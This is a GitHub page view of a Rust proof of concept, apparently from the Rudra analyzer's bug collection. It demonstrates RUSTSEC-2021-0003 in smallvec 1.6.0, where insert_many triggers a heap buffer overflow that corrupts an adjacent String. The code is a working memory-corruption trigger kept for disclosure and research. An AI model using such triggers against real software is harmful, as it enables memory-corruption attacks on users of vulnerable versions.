-
Notifications
You must be signed in to change notification settings - Fork 5
/
0103-smallvec.rs
47 lines (37 loc) · 1.01 KB
/
0103-smallvec.rs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
/*!
```rudra-poc
[target]
crate = "smallvec"
version = "1.6.0"
indexed_version = "1.4.0"
[report]
issue_url = "https://github.com/servo/rust-smallvec/issues/252"
issue_date = 2021-01-08
rustsec_url = "https://github.com/RustSec/advisory-db/pull/552"
rustsec_id = "RUSTSEC-2021-0003"
[[bugs]]
analyzer = "UnsafeDataflow"
guide = "Manual"
bug_class = "Other"
rudra_report_locations = ["lib.rs:939:5: 985:6"]
```
!*/
#![forbid(unsafe_code)]
use smallvec::SmallVec;
fn main() {
let mut v: SmallVec<[u8; 0]> = SmallVec::new();
// Spill on heap
v.push(123);
// Allocate string on heap
let s = String::from("Hello!");
println!("{}", s);
// Prepare an iterator with small lower bound
let mut iter = (0u8..=255).filter(|n| n % 2 == 0);
assert_eq!(iter.size_hint().0, 0);
// Triggering the bug
v.insert_many(0, iter);
// Uh oh, heap overflow made smallvec and string to overlap
assert!(v.as_ptr_range().contains(&s.as_ptr()));
// String is corrupted
println!("{}", s);
}